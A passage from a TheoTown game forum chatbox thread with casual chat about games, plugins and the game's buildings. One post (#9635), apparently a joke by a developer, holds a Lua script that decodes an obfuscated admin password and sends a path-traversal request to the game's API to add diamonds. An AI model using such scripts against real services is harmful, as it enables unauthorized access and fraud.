TheoTown Forum Chatbox

Here you can talk about everything you want.
User avatar
Uncle Koala
Metropolitan
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9621

Post by Uncle Koala »

You might have to wait until Christmas

User avatar
RayXP
Inhabitant of a Infinity
Posts: 8892
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9622

Post by RayXP »

That's too long :( Can we get it on Black Friday? :)

User avatar
TheFennekin
Neighborhood fox
Posts: 2728
Joined: 24 Aug 2017, 11:17
Location: Wandering around
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9623

Post by TheFennekin »

Halloween? 🎃

User avatar
RayXP
Inhabitant of a Infinity
Posts: 8892
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9624

Post by RayXP »

Maybe

User avatar
TheFennekin
Neighborhood fox
Posts: 2728
Joined: 24 Aug 2017, 11:17
Location: Wandering around
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9625

Post by TheFennekin »

I wish it's possible to add your own influence in your plugins 😕

User avatar
Uncle Koala
Metropolitan
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9626

Post by Uncle Koala »

Anyone here seen the new Microsoft Flight Simulator? It looks amazing. I saw a video of someone intentionally slowing their internet down to see how 2D Satelitte images turn into full 3D cities. Truly next gen.

User avatar
CommanderABab
AB
Posts: 11245
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9627

Post by CommanderABab »

I watched a video of someone doing the challenge of landing a plane on a runway half the length recommended for the plane.

User avatar
Kamikazi
Inhabitant of a Conurbation
Posts: 471
Joined: 27 Jan 2018, 00:58
Location: ESPAÑA
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9628

Post by Kamikazi »

MFS 2020 is just straight up astonishing. I saw 2 joke-ish videos about it and 2 videos of raw gameplay footage. It really looks realistic. I'm also impressed with the default planes

User avatar
Uncle Koala
Metropolitan
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9629

Post by Uncle Koala »

Lobby in 2018 wrote: Yeah, it's a cool building. I'm afraid there could be complains if I re-add it into the game natively, as it would mean that we have more buildings of a specific religion. I often get requests to add buildings of various religions...
Today:
Screenshot_20200820_193828_info.flowersoft.theotown.theotown-picsay.jpg
🤔

User avatar
malsa
Inhabitant of a Multiverse
Posts: 5085
Joined: 10 Feb 2017, 17:40
Location: Malaysia
Plugins: Showcase Store
Version: Beta

Platform

Re: TheoTown Forum Chatbox

#9630

Post by malsa »

Do we have synagogue and temple in theotown?

User avatar
CommanderABab
AB
Posts: 11245
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9631

Post by CommanderABab »


User avatar
CommanderABab
AB
Posts: 11245
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9632

Post by CommanderABab »

Apparently not.

User avatar
Uncle Koala
Metropolitan
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9633

Post by Uncle Koala »

To people who read crash reports: Sorry for those stack overflows, won't happen again! :bf

Anyways, I made AMAZING progress on my Terrain Tools plugin.

Replacing all ground with sand on a giant map took almost 2 hours. Now? It's 5 seconds. 5 SECONDS! And it affects no other scripts at all! Nothing runs until you make it run! This means I can add all kinds of scripts now and the impact will be minimal.
Tekib_20-08-22_19.58.07.png
Sorry for the night mode. If you zoom in, you will see that it's not snow, it's sand!

User avatar
RayXP
Inhabitant of a Infinity
Posts: 8892
Joined: 17 Nov 2018, 21:49
Location: Pearland, TX
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9634

Post by RayXP »

Anyone know how to fix this? My xbox disconnects from my wifi like every 5 minutes, and it's really annoying...

User avatar
JustAnyone
Developer
Posts: 3582
Joined: 23 Jul 2017, 12:45
Location: Easter Island
Plugins: Showcase Store

Platform

Re: TheoTown Forum Chatbox

#9635

Post by JustAnyone »

Found a cheesy exploit which you can use to generate diamonds. Either that or it's somehow broken, idk.
Unfortunately, it's limited for 1 diamond per http request

Code: Select all    Reset

local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' function dec(data) data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end local LuaSocket = require("socket") client = LuaSocket.connect("ja.theotown.com", 80) client:send("GET ../../api/public/diamond_req.php?login=admin&pass="..dec('NDJkU2FYcGVyaWE=').."&action=add_diamond&param1=1&user=<your_forum_user_id> HTTP/1.0\r\nHost: ja.theotown.com\r\n\r\n") while true do s, status, partial = client:receive('*a') print(s or partial) if status == "closed" then break end end client:close()
Lua editor
Run

User avatar
CommanderABab
AB
Posts: 11245
Joined: 07 Jun 2016, 21:12
Plugins: Showcase Store
Version: Beta

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9636

Post by CommanderABab »


Turn your volume up

@JustAnyone

User avatar
Uncle Koala
Metropolitan
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9637

Post by Uncle Koala »

JustAnyone can show diamond exploits but if I did something like that, I would be banned. :fire

User avatar
Kamikazi
Inhabitant of a Conurbation
Posts: 471
Joined: 27 Jan 2018, 00:58
Location: ESPAÑA
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9638

Post by Kamikazi »

Huh, nice exploit

User avatar
JustAnyone
Developer
Posts: 3582
Joined: 23 Jul 2017, 12:45
Location: Easter Island
Plugins: Showcase Store

Platform

Re: TheoTown Forum Chatbox

#9639

Post by JustAnyone »

Uncle Koala wrote:
25 Aug 2020, 08:56
JustAnyone can show diamond exploits but if I did something like that, I would be banned. :fire
pls share with me

User avatar
Uncle Koala
Metropolitan
Posts: 142
Joined: 05 Apr 2020, 14:53
Location: Pitcairn Islands
Plugins: Showcase Store
Version: Beta
Contact:

Plugin Creator

Platform

Re: TheoTown Forum Chatbox

#9640

Post by Uncle Koala »

JustAnyone wrote:
25 Aug 2020, 12:16
Uncle Koala wrote:
25 Aug 2020, 08:56
JustAnyone can show diamond exploits but if I did something like that, I would be banned. :fire
pls share with me
Hmm... I'll think about it. Meanwhile, you can think about this :space
Uncle Koala wrote:
24 Aug 2020, 20:11
<..>

Suggestion to devs: please add something like Tile.setUntouchable(x, y) :ugeek:

Post Reply Previous topicNext topic

Return to “Smalltalk”